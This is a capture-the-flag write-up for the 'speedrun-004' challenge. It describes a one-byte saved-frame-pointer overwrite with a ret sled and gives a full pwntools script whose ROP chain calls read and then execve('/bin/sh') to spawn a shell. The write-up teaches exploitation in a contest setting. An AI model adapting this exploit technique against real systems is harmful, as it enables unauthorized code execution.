How to Solve
Frame Pointer Overwriting
- Change the last byte of ebp to \x00 so that it points to some part of the buffer.
- Fill the front of the buffer with ret so that a ret sled occurs.
This turns it into the same SROP problem as Speedrun-001.
Design the Payload
read(0, address of bss, 8);
execve("/bin/sh", NULL, NULL);
Exploit
from pwn import *

p = process('./speedrun-004')

# Gadget addresses used by the chain
ret = 0x400416       # ret (used for the ret sled)
syscall = 0x474f15   # syscall
rax = 0x415f04       # pop rax ; ret
rdi = 0x400686       # pop rdi ; ret
rsi = 0x410a93       # pop rsi ; ret
rdx = 0x44a155       # pop rdx ; ret
bss = 0x6bbbbb       # writable scratch area that will hold "/bin/sh"

payload = b""
payload += p64(ret) * 14         # ret sled: wherever the frame pointer lands, execution slides into the chain

# read(0, bss, 8)
payload += p64(rdi) + p64(0)
payload += p64(rsi) + p64(bss)
payload += p64(rdx) + p64(8)
payload += p64(rax) + p64(0)     # SYS_read
payload += p64(syscall)

# execve(bss, NULL, NULL)
payload += p64(rdi) + p64(bss)
payload += p64(rsi) + p64(0)
payload += p64(rdx) + p64(0)
payload += p64(rax) + p64(59)    # SYS_execve
payload += p64(syscall)

payload += b'\x00'               # 257th byte: overwrites the low byte of the saved frame pointer

p.sendlineafter(b'say?\n', b'257')       # length: 32 qwords + 1 byte
p.sendafter(b'yourself?\n', payload)
p.send(b'/bin/sh\x00')                   # consumed by read(0, bss, 8)
p.interactive()
Get The Shell